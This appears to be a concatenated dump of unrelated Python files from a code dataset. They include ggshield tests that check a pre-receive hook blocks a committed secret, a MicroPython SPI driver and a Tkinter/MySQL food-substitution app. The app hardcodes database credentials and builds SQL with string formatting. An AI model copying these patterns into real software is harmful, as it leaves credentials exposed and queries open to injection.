e:\n logging.info(\"Error Occured in the initaie data transformation\")\n raise CustomException(e,sys)\n\n \n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"mohiteyashprogrammer/boston_house_price_prediction","sub_path":"src/compoments/data_transformation.py","file_name":"data_transformation.py","file_ext":"py","file_size_in_byte":3911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"7582655764","text":"print(\"How many numbers do you want to print?\")\na=int(input())\n\nfab1=0\nfab2=1\nfor b in range(0,a):\n print(fab1)\n sum=fab1+fab2\n fab2=fab1\n fab1=sum\n\nprint(\"Thanks for your using my program\")\n","repo_name":"prensoni0143/Python","sub_path":"Fib-series.py","file_name":"Fib-series.py","file_ext":"py","file_size_in_byte":203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"22683508767","text":"from pathlib import Path\nfrom subprocess import CalledProcessError\n\nimport pytest\n\nfrom tests.conftest import GG_VALID_TOKEN\nfrom tests.functional.utils import recreate_censored_content\nfrom tests.repository import Repository\n\n\nHOOK_CONTENT = \"\"\"#!/bin/sh\nset -e\nggshield secret scan pre-receive\n\"\"\"\n\n\ndef test_scan_prereceive(tmp_path: Path) -> None:\n # GIVEN a remote repository\n remote_repo = Repository.create(tmp_path / \"remote\", bare=True)\n\n # AND a local clone\n local_repo = Repository.clone(remote_repo.path, tmp_path / \"local\")\n\n # AND ggshield installed as a pre-receive hook\n hook_path = remote_repo.path / \"hooks\" / \"pre-receive\"\n hook_path.write_text(HOOK_CONTENT)\n hook_path.chmod(0o755)\n\n # AND a secret committed\n secret_file = local_repo.path / \"secret.conf\"\n secret_content = f\"password = {GG_VALID_TOKEN}\"\n secret_file.write_text(secret_content)\n local_repo.git(\"add\", \"secret.conf\")\n local_repo.create_commit()\n\n # WHEN I try to push\n # THEN the hook prevents the push\n with pytest.raises(CalledProcessError) as exc:\n local_repo.git(\"push\")\n\n # AND the error message contains the leaked secret\n stderr = exc.value.stderr.decode()\n assert recreate_censored_content(secret_content, GG_VALID_TOKEN) in stderr\n\n\ndef test_scan_prereceive_branch_without_new_commits(tmp_path: Path) -> None:\n # GIVEN a remote repository\n remote_repo = Repository.create(tmp_path / \"remote\", bare=True)\n\n # AND a local clone\n local_repo = Repository.clone(remote_repo.path, tmp_path / \"local\")\n\n # Add a commit to the remote repository, otherwise git complains the branch does not\n # contain anything\n local_repo.create_commit()\n local_repo.git(\"push\")\n\n # AND ggshield installed as a pre-receive hook\n hook_path = remote_repo.path / \"hooks\" / \"pre-receive\"\n hook_path.write_text(HOOK_CONTENT)\n hook_path.chmod(0o755)\n\n # AND a branch without new commits\n branch_name = \"topic\"\n local_repo.create_branch(branch_name)\n\n # WHEN I try to push the branch\n # THEN the hook does not crash\n local_repo.git(\"push\", \"-u\", \"origin\", branch_name)\n","repo_name":"grzegorzgniadek/ggshield","sub_path":"tests/functional/secret/test_scan_prereceive.py","file_name":"test_scan_prereceive.py","file_ext":"py","file_size_in_byte":2153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"2"} +{"seq_id":"40026659598","text":"import machine\nimport utime\nimport time\nimport struct\n\ndef setL2S2SPI():\n global spi1\n spi1 = machine.SPI(1,\n baudrate=100000,\n polarity=0,\n phase=1,\n bits=8,\n firstbit=machine.SPI.MSB,\n sck=machine.Pin(10),\n mosi=machine.Pin(11),\n miso=machine.Pin(12))\n \ndef boot_L2S2():\n global L2S2_TIMEOUT\n L2S2_TIMEOUT = 10\n # Assign chip select (CS) pin (and start it high)\n global spi1cs\n spi1cs = machine.Pin(13, machine.Pin.OUT)\n spi1cs.value(1)\n setL2S2SPI()\n print(myTimeNow(),\"Startup\")\n\ndef myTimeNow():\n yr, mt, d, hr, m, s, day, yrday = utime.localtime()\n yr = str(yr) if len(str(yr)) > 1 else \"0\" + str(yr)\n mt = str(mt) if len(str(mt)) > 1 else \"0\" + str(mt)\n d = str(d) if len(str(d)) > 1 else \"0\" + str(d)\n hr = str(hr) if len(str(hr)) > 1 else \"0\" + str(hr)\n m = str(m) if len(str(m)) > 1 else \"0\" + str(m)\n s = str(s) if len(str(s)) > 1 else \"0\" + str(s)\n return yr + \"-\" + mt + \"-\" + d + \" \" + hr + \":\" + m + \":\" + s\n\ndef CCITT_crc16_false(data: bytes, start, length): # ignoring start and length for now as it wasn't used\n table = [ \n 0x0000, 0x1021, 0x2042, 0x3063, 0x4084, 0x50A5, 0x60C6, 0x70E7, 0x8108, 0x9129, 0xA14A, 0xB16B, 0xC18C, 0xD1AD, 0xE1CE, 0xF1EF,\n 0x1231, 0x0210, 0x3273, 0x2252, 0x52B5, 0x4294, 0x72F7, 0x62D6, 0x9339, 0x8318, 0xB37B, 0xA35A, 0xD3BD, 0xC39C, 0xF3FF, 0xE3DE,\n 0x2462, 0x3443, 0x0420, 0x1401, 0x64E6, 0x74C7, 0x44A4, 0x5485, 0xA56A, 0xB54B, 0x8528, 0x9509, 0xE5EE, 0xF5CF, 0xC5AC, 0xD58D,\n 0x3653, 0x2672, 0x1611, 0x0630, 0x76D7, 0x66F6, 0x5695, 0x46B4, 0xB75B, 0xA77A, 0x9719, 0x8738, 0xF7DF, 0xE7FE, 0xD79D, 0xC7BC,\n 0x48C4, 0x58E5, 0x6886, 0x78A7, 0x0840, 0x1861, 0x2802, 0x3823, 0xC9CC, 0xD9ED, 0xE98E, 0xF9AF, 0x8948, 0x9969, 0xA90A, 0xB92B,\n 0x5AF5, 0x4AD4, 0x7AB7, 0x6A96, 0x1A71, 0x0A50, 0x3A33, 0x2A12, 0xDBFD, 0xCBDC, 0xFBBF, 0xEB9E, 0x9B79, 0x8B58, 0xBB3B, 0xAB1A,\n 0x6CA6, 0x7C87, 0x4CE4, 0x5CC5, 0x2C22, 0x3C03, 0x0C60, 0x1C41, 0xEDAE, 0xFD8F, 0xCDEC, 0xDDCD, 0xAD2A, 0xBD0B, 0x8D68, 0x9D49,\n 0x7E97, 0x6EB6, 0x5ED5, 0x4EF4, 0x3E13, 0x2E32, 0x1E51, 0x0E70, 0xFF9F, 0xEFBE, 0xDFDD, 0xCFFC, 0xBF1B, 0xAF3A, 0x9F59, 0x8F78,\n 0x9188, 0x81A9, 0xB1CA, 0xA1EB, 0xD10C, 0xC12D, 0xF14E, 0xE16F, 0x1080, 0x00A1, 0x30C2, 0x20E3, 0x5004, 0x4025, 0x7046, 0x6067,\n 0x83B9, 0x9398, 0xA3FB, 0xB3DA, 0xC33D, 0xD31C, 0xE37F, 0xF35E, 0x02B1, 0x1290, 0x22F3, 0x32D2, 0x4235, 0x5214, 0x6277, 0x7256,\n 0xB5EA, 0xA5CB, 0x95A8, 0x8589, 0xF56E, 0xE54F, 0xD52C, 0xC50D, 0x34E2, 0x24C3, 0x14A0, 0x0481, 0x7466, 0x6447, 0x5424, 0x4405,\n 0xA7DB, 0xB7FA, 0x8799, 0x97B8, 0xE75F, 0xF77E, 0xC71D, 0xD73C, 0x26D3, 0x36F2, 0x0691, 0x16B0, 0x6657, 0x7676, 0x4615, 0x5634,\n 0xD94C, 0xC96D, 0xF90E, 0xE92F, 0x99C8, 0x89E9, 0xB98A, 0xA9AB, 0x5844, 0x4865, 0x7806, 0x6827, 0x18C0, 0x08E1, 0x3882, 0x28A3,\n 0xCB7D, 0xDB5C, 0xEB3F, 0xFB1E, 0x8BF9, 0x9BD8, 0xABBB, 0xBB9A, 0x4A75, 0x5A54, 0x6A37, 0x7A16, 0x0AF1, 0x1AD0, 0x2AB3, 0x3A92,\n 0xFD2E, 0xED0F, 0xDD6C, 0xCD4D, 0xBDAA, 0xAD8B, 0x9DE8, 0x8DC9, 0x7C26, 0x6C07, 0x5C64, 0x4C45, 0x3CA2, 0x2C83, 0x1CE0, 0x0CC1,\n 0xEF1F, 0xFF3E, 0xCF5D, 0xDF7C, 0xAF9B, 0xBFBA, 0x8FD9, 0x9FF8, 0x6E17, 0x7E36, 0x4E55, 0x5E74, 0x2E93, 0x3EB2, 0x0ED1, 0x1EF0\n ]\n \n crc = 0xFFFF\n for byte in data:\n crc = (crc << 8) ^ table[(crc >> 8) ^ byte]\n crc &= 0xFFFF\n return crc\n\ndef spiToL2S2(header, payload):\n global spi1\n global spi1cs\n ### Create packet for sending\n # Join together bytearrays\n hdr = bytearray(header.to_bytes(1,'little'))\n length = bytearray(len(payload).to_bytes(2,'little'))\n crc = CCITT_crc16_false(hdr + length + payload, 0, int(len(hdr + length + payload)))\n crcarray = bytearray(crc.to_bytes(2,'little'))\n packetToSend = hdr + length + crcarray + payload\n print(myTimeNow(),\"Sending \", \" \".join('{:02x}'.format(x) for x in packetToSend))\n \n\n ##### Reads spy response ######\n spi1cs.value(0)\n spi1.write(packetToSend)\n spi1cs.value(1)\n time.sleep_ms(10)\n spi1cs.value(0)\n replyHeader = b'\\x00'\n startTime = time.ticks_ms()\n while (replyHeader == b'\\x00' and time.ticks_diff(time.ticks_ms(), startTime)<(L2S2_TIMEOUT*1000)):\n spi1cs.value(0) # GSL\n replyHeader = spi1.read(1)\n time.sleep_ms(100)\n if replyHeader == b'\\x00':\n spi1cs.value(1) # GSL\n\n ##### Show response on spi #####\n replyLength = spi1.read(2)\n replyCRC = spi1.read(2)\n replyLengthVal = int.from_bytes(replyLength, 'little')\n if replyLengthVal > 0x400:\n replyLengthVal = 0x400\n replyPayload = spi1.read(replyLengthVal)\n spi1cs.value(1)\n \n crc = CCITT_crc16_false(replyHeader + replyLength + replyPayload, 0, int(len(replyHeader + replyLength + replyPayload)))\n print(myTimeNow(),\"Reply Header \", \" \".join('{:02x}'.format(x) for x in replyHeader))\n print(myTimeNow(),\"Reply Length \", \" \".join('{:02x}'.format(x) for x in replyLength))\n print(myTimeNow(),\"Reply CRC \", \" \".join('{:02x}'.format(x) for x in replyCRC))\n print(myTimeNow(),\"Reply Payload \", \" \".join('{:02x}'.format(x) for x in replyPayload))\n print(myTimeNow(),\"Calculated CRC \", \" \".join('{:02x}'.format(x) for x in crc.to_bytes(2,'little')))\n \n if crc.to_bytes(2,'little') == replyCRC :\n print(myTimeNow(),\"Received: Header \", \" \".join('{:02x}'.format(x) for x in replyHeader), \"Payload \", \" \".join('{:02x}'.format(x) for x in replyPayload))\n return replyHeader, replyPayload\n else:\n print(myTimeNow(),\"L2S2 Timeout or CRC error\")\n time.sleep(1)\n return b'\\x00', b'\\x00'\n\n\n## Takes _record_id, plate_id, _control_id as strings; _type as number 1:5; content of different types; _units as string;\n## Datatypes: 1 = bool; 2 = int; 3 = double; 4 = datetime; 5 = string\ndef data_send(_record_id, _plate_id, _control_id, _type, _content, _units):\n #Payload_diode init\n payload_diode = bytearray([0x00, 0x00, 0xFF, 0x00]) #red = (0, 0, 255)\n\n #Diode on\n spiToL2S2(99, payload_diode)\n\n #Creation of the field id as bytearray\n _field_id = _record_id + '|' + _plate_id + '|' + _control_id + '\\0' # string terminator (see the MMDC doc)\n _field_id_b = bytearray(_field_id.encode(\"utf-8\"))\n\n #Creation of the datatype of content as byte:\n _type_b = bytearray(1)\n _type_b[0]=_type\n\n #Creation of the content as bytearray (here content is an int) \n #Need to make if options for different datatypes\n if (_type == 1):\n _content_b = bytearray([0x00])\n _content_b[0] = _content\n elif (_type == 2):\n _content_b = _content.to_bytes(4,'little')\n elif (_type == 3):\n _content_b = bytearray(struct.pack(\"d\", _content)) \n print(_content_b)\n elif (_type == 4):\n _content_b = _content.to_bytes(8,'little') #seconds since 1st Jan 1970, held as a long (64-bit C type time_t)\n print(_content_b)\n elif (_type == 5):\n _content_b = bytearray((_content + '\\0').encode(\"utf-8\"))\n\n\n #Creation of the unit name as bytearray\n _units_b = bytearray(_units.encode(\"utf-8\"))\n\n #Concatenation of the payload bytearray\n _payload=_field_id_b + _type_b + _content_b #+ _units_b\n print(f\"PAYLOAD: {_payload}\")\n #Sending of the payload to the server\n spiToL2S2(150, _payload)\n\n #Payload_diode off\n payload_diode = bytearray([0x00, 0x00, 0x00, 0x00]) #off = (0, 0, 0)\n\n #Diode off\n spiToL2S2(99, payload_diode)","repo_name":"RehanSheikh-eng/3GM1_team_3","sub_path":"L2S2/L2S2_lib.py","file_name":"L2S2_lib.py","file_ext":"py","file_size_in_byte":7639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"12017158520","text":"\"\"\" class Interface\"\"\"\nfrom tkinter import END, X, BOTH, Button, Frame, Label, Listbox\nimport functools\nimport math\nimport records\nimport pymysql\n\nclass Interface(Frame):\n \"\"\"\n That class creates the main frame containing all the content used to display and organize the\n data from OpenFoodFact contained in the database created by the class Database.\n The user will have the choice between two buttons, one to select the categories contained in\n the database and get a substituted from the aliments contained in the categories selected,\n the aliment substituted can be saved in the database.\n The second button display the aliments saved in the database.\n \"\"\"\n def __init__(self, fenetre, **kwargs):\n \"\"\"\n initialize the widgets and attributes necessary to use the class\n \"\"\"\n self.db = records.Database('mysql+pymysql://rayane:aaaabbbb1234@localhost/offdb')\n #variable containing the connection to the database with records\n self.connection = pymysql.connect(host='localhost',\n user='rayane',\n password='aaaabbbb1234',\n db='offdb',\n charset='utf8mb4',\n cursorclass=pymysql.cursors.DictCursor)\n #variable containing the connection the database with pymysql\n\n\n Frame.__init__(self, fenetre, width=2000, height=1000, **kwargs)\n self.pack(fill=BOTH)\n #Create the main containing all the other widgets\n\n self.chose_a_substitute = Button(self, text=\"1-Quel aliment souhaitez-vous remplacer?\",\\\n command=self.chose_category, width=200, height=17)\n self.chose_a_substitute.pack(fill=X)\n #Button that will display the categories in the db by calling the method chose_category\n\n self.display_substitutes_saved = Button(self, text=\"2-Retrouver mes aliment substitués\",\\\n command=self.display_aliments_saved, width=200, height=17)\n self.display_substitutes_saved.pack(fill=X)\n #Button that will display the substitutes saved in the Database by calling\n #the method display_aliments_saved\n\n self.previous_menu = Button(text=\"Retour\", command=self.move_on_choice_menu)\n #Button that allow the user to comeback on the first menu to chose between the button\n #chose_a_substitute and display_a_substitutes_saved\n self.label = Label(self, text='Choisissez une catégorie à consulter:')\n #Label widget that display a text to make the actions to do clearer\n\n self.saving_list = Listbox(self, width=200, height=30)\n #Create the list that will contain the substitutes saved in the database\n self.categories_list = Listbox(self, width=200, height=30)\n #Create the list that will contain the categories saved in the database\n\n def display_aliments_saved(self):\n \"\"\"\n Method displaying the aliments saved in the database\n \"\"\"\n new_connection = records.Database('mysql+pymysql://rayane:aaaabbbb1234@localhost/offdb')\n\n self.chose_a_substitute.pack_forget()\n self.display_substitutes_saved.pack_forget()\n #Hide the buttons chose_a_substitute and display_substitutes_saved\n\n self.saving_list.pack(side=\"bottom\")\n self.saving_list.delete(0, END)\n #Display the listbox saving_list in the main frame and empty it before\n #getting the aliments saved from the database\n\n self.label.config(text=\"Liste des aliments substitués\", bg=\"#D6D6D6\")\n self.label.pack(side=\"top\")\n #Change the text displayed in the label and keep it at the top of the main frame\n\n self.aliments = new_connection.query('select * from saving')\n #Attribute containing all the aliments saved in the database by querying them\n #via records\n self.add_to_list(self.saving_list, self.aliments)\n #Method that add the aliments placed in argument in the list added as argument\n self.colour_list(self.saving_list, 5)\n #Method colouring the elements composing one aliment for every one on two aliments\n\n self.previous_menu.pack(side=\"bottom\")\n self.previous_menu.config(text=\"Retour\", command=self.move_on_choice_menu)\n #Place the previous_menu button at the bottom of the main frame and make sure\n #that the config of the button bring back on the first menu\n\n def colour_list(self, listname, number_of_rows_per_aliment):\n \"\"\"\n Colour the elements in the listbox to make them more visible.It colours 4\n elements every fourr elements because the informations contained on each aliment\n are displayed on 4 elements (name, where_to_buy,url and description)\n \"\"\"\n for aliment in range(int(listname.size()/number_of_rows_per_aliment)):\n #We divide by 4 the number of elements in the list coloured to know the number of\n #aliments that it contains\n if aliment%2 == 0:\n #The even aliments are not coloured\n continue\n else:\n #If not even we colour the 4 items describing the aliments in the listbox\n for line in range(number_of_rows_per_aliment):\n #for the 4 next elements\n listname.itemconfig(line+(number_of_rows_per_aliment*aliment), {'bg':'#CBCBCB'})\n #(4*item) to know where the first item of the aliment begin in the listbox\n\n def add_to_list(self, list_name, aliments):\n \"\"\"\n Add in the list chosen for the list_name argument the description of the aliments\n chosen for the aliments\n \"\"\"\n for aliment in aliments:\n list_name.insert(END, \"Nom du produit: %s \" %aliment[\"aliments_names\"])\n list_name.insert(END, \"Où l'acheter: %s\" %aliment['where_to_buy'])\n list_name.insert(END, \"URL: %s\" %aliment['OpenFoodFact_url'])\n list_name.insert(END, \"Description: %s\" %aliment['aliment_description'])\n if list_name == self.saving_list:\n list_name.insert(END, \"Nom aliment substitué: %s\"\\\n %aliment['name_aliment_substituted'])\n\n def move_on_choice_menu(self):\n \"\"\"\n Method to comeback on the first menu to chose between the button chose_a_substitute\n and display_a_substitutes_saved\n \"\"\"\n self.label.pack_forget()\n self.categories_list.pack_forget()\n self.previous_menu.pack_forget()\n self.saving_list.pack_forget()\n #Hide the label, the categories_list list, the previous_menu button and the saving_list list\n #because they are the widgets displayed when we want to come back to the first menu\n self.chose_a_substitute.pack(fill=X)\n self.display_substitutes_saved.pack(fill=X)\n #Display the buttons of the first menu : chose_a_substitute and display_substitutes_saved\n\n def move_on_categories_menu(self):\n \"\"\"\n Method to comeback on the menu where we can choose from which category we want to\n display the aliments saved in the database\n \"\"\"\n self.aliments_list.pack_forget()\n #Hide the list displaying the aliments\n self.categories_list.pack(side=\"bottom\")\n self.categories_list.bind('',\\\n functools.partial(self.get_aliments, nutrition_grade=\"e\"))\n #Display the list containing the categories and bind to the elements in the listbox\n #the method get_aliments that will get the aliments from the category selected\n #with a nutrition_grade of \"e\"\n self.label.config(text=\"Cliquez sur une catégorie pour voir ses aliments:\")\n self.previous_menu.config(command=self.move_on_choice_menu)\n #Change the method call by the previous_menu button to move_on_choice_menu because the\n #user will be in the category menu after the call of move_on_categories_menu\n\n def move_on_results_menu(self):\n \"\"\"\n Method to move back in the menu where we can choose which aliment we want\n to get a substitute from.\n \"\"\"\n self.saving_button.pack_forget()\n self.substitute_list.pack_forget()\n #Hide the widgets saving_button and substitute_list\n self.label.config(text=\"Choisissez l'aliment à substituer avec la souris\", bg=\"#D6D6D6\")\n self.aliments_list.pack(side=\"bottom\")\n #Display the list containing the aliments under the label\n self.previous_menu.pack(side=\"bottom\")\n self.previous_menu.config(text=\"Retour\", command=self.move_on_categories_menu)\n #Change the method called when the user click on the button by move_on_categories_menu\n #because once the method move_on_results_menu is called, the menu before that is the one\n #of the category to chose.\n\n def chose_category(self):\n \"\"\"\n Display the menu to chose a category by calling the categories contained in the database\n \"\"\"\n self.chose_a_substitute.pack_forget()\n self.display_substitutes_saved.pack_forget()\n #Hide the buttons of the first menu\n self.label.pack(side=\"top\", fill=X)\n self.label.config(text=\"Cliquez sur une catégorie pour voir ses aliments:\")\n #display the message asking the user to chose a category to see the aliments of\n self.categories_list.delete(0, END)\n self.categories = self.db.query('select * from categories')\n self.categories_list.pack(fill=BOTH)\n for category in self.categories:\n self.categories_list.insert(END, category[\"categories_names\"])\n self.categories_list.bind('',\\\n functools.partial(self.get_aliments, nutrition_grade=\"e\"))\n #Empty the content of the categories_list listbox, then get the categories contained in,\n #the database displayed the listbox, add the categories names as elements of the listbox\n #categories_list and bind the method get_aliments to the elements of the listbox\n\n self.previous_menu.pack(side=\"bottom\")\n\n def get_aliments(self, evt, nutrition_grade):\n \"\"\"\n Method getting the aliments depending of the nutrition_grade chosen in argument\n \"\"\"\n if nutrition_grade == \"e\":\n self.category_id = self.categories_list.curselection()[0] + 1\n #curselection()[0] gives the number of the first element selected in the listbox.\n #The first element of a listbox is 0, but in a database the first element begin at one.\n #So the id of the category chosen equal the number of the element chosen plus one.\n self.categories_list.pack_forget()\n #Hide the list containing the categories\n self.aliments_list = Listbox(self, width=200, height=30)\n self.aliments_list.pack(side=\"bottom\")\n #Create an place under the label the list that will contain\n #the aliments of the category chosen\n self.label.config(text=\"Cliquez sur un aliment pour voir son substitut:\",\n bg=\"#D6D6D6\")\n #Change the text of the label\n self.aliments = self.db.query('select * from aliments where nutrition_grade = \"e\" \\\n and categories_id = %s' %(self.category_id))\n self.add_to_list(self.aliments_list, self.aliments)\n self.colour_list(self.aliments_list, 4)\n #Get the aliment with a SQL query on the database via records depending of\n #the id of the category selected previously and with a nutrition_grade of e,\n # then add the aliments to the listbox aliments_list and colour the elements of the list\n self.previous_menu.config(text=\"Retour\", command=self.move_on_categories_menu)\n #Change the method call by clicking on the return button by move_on_categories_menu\n self.aliments_list.bind('', \\\n functools.partial(self.get_aliments, nutrition_grade=\"a\"))\n #Add an event on the element of aliments_list so that the method get_aliments is called\n #with \"a\" for argument to be able to display an aliment with a better nutrition grade by\n #clicking on one of the aliments in the aliments_list\n\n if nutrition_grade == \"a\":\n self.aliment_id = int(math.ceil((self.aliments_list.curselection()[0] + 1)/4))\n #The id of the element selected in the aliments_list equal the place in the list of\n #the first element selected plus one like previously seen for the category id.But this\n #time it is divided by four because each aliment is displayed on four elements of the\n #list and rounded up to get the id.If the user click on one of the four first elements,\n #he would get either 0.25, 0.50, 0.75 or 1 that would be rounded up so that for each\n #elements he would get the number 1 that is the id of the aliment selected.\n self.name_aliment_substituted = self.db.query('select aliments_names from aliments \\\n where id = %s ' %(self.aliment_id))\n self.name_aliment_substituted = self.name_aliment_substituted[0][\"aliments_names\"]\n #Once the id gotten, we query that aliment in the database via the aliment_id and\n #we keep the name of that aliment in an attribute named name_aliment_substituted\n self.label.config(text=\"Voici un substitut possible:\", bg=\"#D6D6D6\")\n self.aliments_list.pack_forget()\n #Change the label text and hide the aliment_list to replace with the substitute_list one\n self.substitute_list = Listbox(self, width=200, height=30)\n self.substitute_list.pack(side=\"bottom\")\n #Create the substitute_list and display it under the label\n self.aliments = self.db.query('select * from aliments where nutrition_grade = \"a\" \\\n and categories_id = %s ORDER BY RAND() LIMIT 1' %(self.category_id))\n #Get a random aliment from the databse with a nutrition gra de of a\n self.saving_button = Button(text=\"Sauvegarder en bdd\", command=self.save_in_db)\n self.saving_button.pack(side=\"left\")\n self.add_to_list(self.substitute_list, self.aliments)\n #Create a button displayed in the bottom left called saving_button\n #that will add the substitute displayed in the substitute_list inside\n #a table containing all the substitutes saved by the user\n self.previous_menu.config(command=self.move_on_results_menu)\n self.previous_menu.pack(side=\"right\")\n #Change the method called by the return button and display it in the botom right\n\n def save_in_db(self):\n \"\"\"\n Save in the table saving the substituted displayed in substitute_list\n \"\"\"\n with self.connection.cursor() as cursor:\n insert_aliments = \"\"\"INSERT INTO `saving`\n (`aliments_names`, `name_aliment_substituted`, `aliment_description`,\n `where_to_buy`, `OpenFoodFact_url`, `nutrition_grade`)\n VALUES (%s, %s, %s, %s, %s, %s)\"\"\"\n cursor.execute(insert_aliments,\\\n (self.aliments[0][\"aliments_names\"], self.name_aliment_substituted,\\\n self.aliments[0][\"aliment_description\"], self.aliments[0][\"where_to_buy\"],\\\n self.aliments[0][\"OpenFoodFact_url\"], self.aliments[0][\"nutrition_grade\"]))\n self.connection.commit()\n #Insert into the table containing the substitutes saved the substitute displayed in substitute_list\n self.label.config(text=\"L'aliment a bien été sauvegardé\", bg=\"red\")\n #Change the label text to inform the user of the insertion in database once it is done\n","repo_name":"rayaneberrada/OFF-Tkinter-API","sub_path":"Interface.py","file_name":"Interface.py","file_ext":"py","file_size_in_byte":16172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"27816824925","text":"# Sort library\nfrom operator import itemgetter\n\nqolang_export = {\n \"sortonelist\": \"sort\",\n \"sortonelistr\": \"sortr\",\n \"sorttwolists\": \"sortbyval\",\n \"sorttwolistsr\": \"sortbyvalr\",\n}\n\ndef sortonelist(Variables, args):\n \"\"\"\n Sort a list.\n \"\"\"\n return (Variables, args[0].sort())\n\ndef sortonelistr(Variables, args):\n \"\"\"\n Sort a list, reversed.\n \"\"\"\n return (Variables, args[0].sort(reverse=True))\n\ndef sorttwolists(Variables, args):\n \"\"\"\n Sort two lists by the values of the second list.\n \"\"\"\n i = 0\n ddict = dict()\n for var in args[1]:\n ddict[var] = args[0][i]\n i += 1\n ddict = {k: v for k, v in sorted(ddict.items(), key=lambda item: item[0])}\n return (Variables, [ddict.keys(), ddict.values()])\n\ndef sorttwolistsr(Variables, args):\n \"\"\"\n Sort two lists by the values of the second list, reversed.\n \"\"\"\n i = 0\n ddict = dict()\n for var in args[1]:\n ddict[var] = args[0][i]\n i += 1\n ddict = {k: v for k, v in sorted(ddict.items(), key=lambda item: item[0], reverse=True)}\n return (Variables, [list(ddict.values()), list(ddict.keys())])\n","repo_name":"Camroku/Camlog","sub_path":"src/lib/sort.py","file_name":"sort.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"2"} +{"seq_id":"74533852525","text":"#!/usr/bin/env python3\n\nimport time\nimport collections\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport cv2 as cv\nimport pyrealsense2 as rs\nimport open3d\n\nfrom rigid_transform import rigid_transform_3D\n\n#np.seterr(all='raise')\nnp.set_printoptions(precision=3)\nnp.set_printoptions(suppress=True)\n\n\ncolormap = np.int32(plt.cm.jet(np.linspace(0,1,256)) * 255)\ndef depth_to_color(d):\n dmin = 1.0 # if d is here, then ii should be 255.0\n dmax = 9.0 # if d is here, then ii should be 0.0\n\n m = -255.0 / (dmax - dmin);\n b = 255 - (m * dmin);\n\n ii = m*d + b;\n\n i = int(round(ii))\n if i < 0:\n i = 0\n elif i > 255:\n i = 255;\n\n # OpenCV is in BGR order\n return int(colormap[i][2]), int(colormap[i][1]), int(colormap[i][0])\n\n\n\nlk_params = {\n 'winSize': (15, 15),\n 'maxLevel': 4,\n 'criteria': (cv.TERM_CRITERIA_EPS | cv.TERM_CRITERIA_COUNT, 10, 0.03)\n}\n\nfeature_params = {\n 'maxCorners': 500,\n 'qualityLevel': 0.04, # originally 0.3\n 'minDistance': 7,\n 'blockSize': 7\n}\n\n\n#track_len = 30\ntrack_len = 130\ndetect_interval = 3\nframe_idx = 0;\ntracks = []\n\npermanent_cloud_points = [] # np.zeros((1,3))\nhaveInitialWorldMap = False\n\nnotAddedYet = True\nprev_gray = None\n\n\npipeline = rs.pipeline()\nconfig = rs.config()\n\nconfig.enable_stream(rs.stream.depth, 640, 480, rs.format.z16, 30)\nconfig.enable_stream(rs.stream.color, 640, 480, rs.format.bgr8, 30)\n#config.enable_device_from_file(sys.argv[1], repeat_playback=False)\n\nprofile = pipeline.start(config)\n\ndepth_sensor = profile.get_device().first_depth_sensor()\ndepth_scale = depth_sensor.get_depth_scale()\n\nrgb_stream = profile.get_stream(rs.stream.color)\nrgb_stream_profile = rs.video_stream_profile(rgb_stream)\nrgb_intrinsics = rgb_stream_profile.get_intrinsics()\n\nw_minus_1 = rgb_intrinsics.width - 1\nh_minus_1 = rgb_intrinsics.height - 1\n\nalign = rs.align(rs.stream.color)\n\n\nclass Track(collections.deque):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.realWorldPointIdx = None # index of real-world 3-D point\n self.point_3d = None # current 3-D point in camera coordinates\n\n\nvis = open3d.visualization.Visualizer()\nvis.create_window(width=800, height=600, left=1100, top=50)\nvis2 = open3d.visualization.Visualizer()\nvis2.create_window(width=800, height=600, left=1100, top=150)\n\nperm_pcd = open3d.geometry.PointCloud()\n\n\npcd = open3d.geometry.PointCloud()\nprev_pcd = open3d.geometry.PointCloud()\n\ncur_points = np.zeros((1,3))\n\ndef update_point_cloud():\n global cur_points\n\n prev_points = cur_points\n prev_colors = np.tile( [0.5, 0, 0], (len(prev_points), 1))\n\n numPts = len(tracks)\n cur_points = np.empty((numPts, 3))\n cur_colors = np.tile( [0, 0.5, 0], (numPts, 1))\n\n for i, t in enumerate(tracks):\n cur_points[i] = t.point_3d\n\n prev_pcd.points = open3d.utility.Vector3dVector(prev_points)\n prev_pcd.colors = open3d.utility.Vector3dVector(prev_colors)\n pcd.points = open3d.utility.Vector3dVector(cur_points)\n pcd.colors = open3d.utility.Vector3dVector(cur_colors)\n\n#position = np.array((0,0,0,1))\nposition = np.array((0,0,0), np.float64)\ndirection = np.array((0,0,1), np.float64)\n\nwhile True:\n\n frames = pipeline.wait_for_frames()\n aligned_frames = align.process(frames)\n depth_frame = aligned_frames.get_depth_frame()\n color_frame = aligned_frames.get_color_frame()\n\n if not depth_frame or not color_frame:\n print(\"missing frame(s)\")\n continue\n\n imRGB = np.asanyarray(color_frame.get_data())\n imD = np.asanyarray(depth_frame.get_data())\n\n\n # We use grayscale for calculations:\n frame_gray = cv.cvtColor(imRGB, cv.COLOR_BGR2GRAY)\n\n if prev_gray is None:\n prev_gray = frame_gray.copy()\n\n if len(tracks):\n # The p0 vector is just the last point in each of the tracks items\n p0 = np.empty((len(tracks), 1, 2), np.float32)\n for i, t in enumerate(tracks):\n p0[i] = [t[-1]]\n\n # Forward tracking\n p1, _st, _err = cv.calcOpticalFlowPyrLK(prev_gray, frame_gray, p0, None, **lk_params)\n\n # Reverse tracking\n p0r, _st, _err = cv.calcOpticalFlowPyrLK(frame_gray, prev_gray, p1, None, **lk_params)\n\n new_tracks = []\n\n for i, p in enumerate(p0):\n x = p1[i][0][0]\n y = p1[i][0][1]\n xx = max(0, min(int(round(x)), w_minus_1))\n yy = max(0, min(int(round(y)), h_minus_1))\n d = cv.norm(p - p0r[i]) # TODO: perhaps this could be a single op in numpy?...\n z_depth = depth_scale * imD[yy, xx]\n if (d < 1.5) and (z_depth < 8.0) and (z_depth > 0.1):\n pt3d = rs.rs2_deproject_pixel_to_point(rgb_intrinsics, [x,y], z_depth)\n tracks[i].append( (x, y) 